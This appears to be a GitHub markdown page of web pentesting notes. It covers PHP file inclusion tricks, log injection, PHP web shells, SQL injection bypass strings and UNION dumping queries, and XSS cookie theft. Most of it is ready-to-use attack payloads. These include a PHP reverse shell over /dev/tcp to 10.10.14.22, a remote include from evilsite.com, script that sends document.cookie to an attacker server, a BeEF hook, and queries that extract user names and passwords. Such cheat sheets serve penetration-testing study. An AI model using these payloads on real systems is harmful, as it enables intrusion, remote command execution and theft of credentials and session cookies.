Skip to content

Latest commit

 

History

History
180 lines (145 loc) · 4.63 KB

web.md

File metadata and controls

180 lines (145 loc) · 4.63 KB
Raw

PHP

A good overview of all this https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

LFI/RFI tricks

So sometimes you can run commands through these LFI's like this old exploit.

curl -s --data "<?system('ls -la');?>" "http://www.site/path/crapco_comment_system/admin.php?CCS_path=php://input%00"

list of possible Apache directories: http://wiki.apache.org/httpd/DistrosDefaultLayout

include access log from file descriptor /proc/self/fd/XX: http://pastebin.com/raw.php?i=cRYvK4jb

include email log files: http://devels-playground.blogspot.de/2007/08/local-file-inclusion-tricks.html

include ssh auth.log

abuse avatar/image/attachment file uploads

include session files: https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

include PHP’s temporarily uploaded files http://gynvael.coldwind.pl/?id=376

Null Byte Injection: ?file=../../../../../../../../../etc/passwd%00

Path Truncation: ?file=../../../../../../../../../etc/passwd...........\ ...

Dot Truncation: ?file=../../../../../../../../../etc/passwd...........

Reverse Path Truncation: ?file=../../../../ […] ../../../../../etc/passwd

Including Remote Code: ?file=[http|https|ftp]://evilsite.com/shell.txt

Using PHP stream php://input: ?file=php://input Specify your payload in the POST parameters

Using PHP stream php://filter: ?file=php://filter/convert.base64-encode/resource=index.php

Logfile Injection

Don't forget maybe you can connect to the server and write code into the logfiles. This may also work with emails if you can view them.

nc <IP> <port>
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: <IP>
Connection: close

Afterwards include the it via LFI: ?lfi_file=/var/log/apache2/access.log&cmd=<command>

LFI Wrapper ZIP
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php   

http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAh
More shell examples and snippets

Evil.txt example to use with any RFI

<?php echo shell_exec("whoami");?>

# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/10.10.14.22/443; sh <&196 >&196 2>&196"); ?>

Other ways to make a shell

<?php $cmd=$_GET['cmd']; system("$cmd"); ?>
<?php echo shell_exec($_GET['cmd']);?>

If you use REQUEST, you can use the GET and POST parameter:

<?php $cmd=$_REQUEST['cmd']; system("$cmd"); ?>

curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php
<pre><?php system($_GET['c']); die(); ?></pre>
<pre><?php system($_GET['c']) ?></pre>
<?php echo system($_REQUEST['cmd']); ?>
References

https://chryzsh.gitbooks.io/pentestbook/content/web-services.html

MySQL

Classic authentication bypass strings
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
SQLi

Check if you can find a row, where you can place your output http://ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8

Get the version of the database http://ip/inj.php?id=1 union all select 1,2,3,@@version,5

Get the current user http://ip/inj.php?id=1 union all select 1,2,3,user(),5

See all tables http://ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables

Get column names for a specified table http://ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'

Concat user names and passwords (0x3a represents “:”) http://ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users

Write into a file http://ip/inj.php?id=1 union all select 1,2,3,"content",5 into OUTFILE 'outfile'

XSS

Some pretty basic notes here related to cookie theft

Start the web server...

python -m SimpleHTTPServer 80

Then use one of the following XSS payloads:

<iframe src="http://10.10.10.10/report" height = "0" width = "0"></iframe>

<script>
new Image().src="http://10.10.10.10/bogus.php?output="+document.cookie;
</script>

Or to use Beef just inject the hook into a XSS after starting it up

<script src="http://10.10.14.22:3000/hook.js"></script>

More reading http://brutelogic.com.br/blog/probing-to-find-xss/